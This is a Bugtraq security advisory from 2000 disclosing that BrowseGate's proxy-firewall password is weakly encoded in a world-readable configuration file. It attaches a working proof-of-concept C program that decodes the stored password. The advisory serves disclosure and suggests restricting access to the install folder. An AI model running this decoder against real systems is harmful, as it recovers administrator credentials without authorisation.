[17695] in bugtraq
Decrypting passwords for BrowseGate
daemon@ATHENA.MIT.EDU (Steven Alexander)
Sun Nov 19 20:35:14 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0025_01C05184.A975DAA0"
Message-Id: <002a01c051c7$d03240f0$0100007f@cell2000.net>
Date: Sat, 18 Nov 2000 17:26:18 -0800
Reply-To: Steven Alexander <steve@cell2000.net>
From: Steven Alexander <steve@CELL2000.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0025_01C05184.A975DAA0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Product: BrowseGate by NetCPlus
Version: 2.80.2 (others?)
OS: Windows NT/2000/9x
Description:
BrowseGate is a proxy firewall from NetCPlus. BrowseGate is sometimes
installed on servers along with other network applications including
SmartServer3 with which it is made to integrate. BrowseGate installs by
default in C:\Program Files\BrowseGate\ and stores it's configuration
information in the file brwgate.ini . The file is accessible, by default,
to all authenticated users (authenticated to Windows). The "encrypted"
password is stored under the 'scrnsze' setting, for instance
scrnsze=Ic6li9m\
The password encryption is very weak. Though it has some other strange
properties, the scheme works by adding a position-specific value to each
character of the password. There are seven characters that encrypt
differently from the rest of the character set, I can only guess that it
might be to throw off any analysis but am not particularly sure. This
scheme appears related to the one used in SmartServer 3 but is somewhat
different. Look at the code for more details.
The vendor was contacted in regards to a previous security issue with
another product. Unfortunately, the vendor acted in an extremely
unprofessional manner. In addition to denying the problem, they responded
with insults and implied threats against me. At this point, it is up to the
customers of this vendor to ask for what they deserve: a reasonable measure
of security. In the meantime, it would be useful to restrict access to the
folder in which BrowseGate is installed.
-Steven Alexander
steve@cell2000.net
------=_NextPart_000_0025_01C05184.A975DAA0
Content-Type: application/octet-stream;
name="browse.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="browse.c"
/* This is proof of concept code for decrypting password from BrowseGate =
by NetCplus */
#include <stdio.h>
int main() {
unsigned char start[8] =3D { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, =
0x3a };
unsigned char hash[8] =3D { '%', '}', 'S', 'p', '%', 'g', 'Z', '(' } ;
/* Enter the encrypted password into hash above */
unsigned char except[8] =3D { '~', ':', 'k', 'C', '@', 'n', 'D', '3' };
unsigned char ex_order[7] =3D { 't', 'm', 'O', 'L', 's', 'B', 'R' };
unsigned char pass[8];
unsigned char i;
unsigned char range;
if(hash[0] >=3D '!' && hash[0] <=3D '&')
hash[0]=3D(hash[0] - 0x20) + 0x7e;
for(i=3D0;i<8;i++) {
if(hash[i] >=3D except[i] && hash[i] <=3D (except[i] + 6) ) {
pass[i]=3Dex_order[ (hash[i] - except[i]) ]; }
else {
if(hash[i] < start[i]) {
hash[i]+=3D0x5e;
}
pass[i]=3Dhash[i] - start[i] + '!';
if(pass[i] >=3D 'B')
pass[i]+=3D1;
if(pass[i] >=3D 'L')
pass[i]+=3D1;
if(pass[i] >=3D 'O')
pass[i]+=3D1;
if(pass[i] >=3D 'R')
pass[i]+=3D1;
if(pass[i] >=3D 'm')
pass[i]+=3D1;
if(pass[i] >=3D 's')
pass[i]+=3D1;
if(pass[i] >=3D 't')
pass[i]+=3D1;
}
}
printf("The password is:\n\t");
for(i=3D0;i<8;i++) {
printf("%c ", pass[i]);
}
printf("\n");
return 0;
}
------=_NextPart_000_0025_01C05184.A975DAA0--
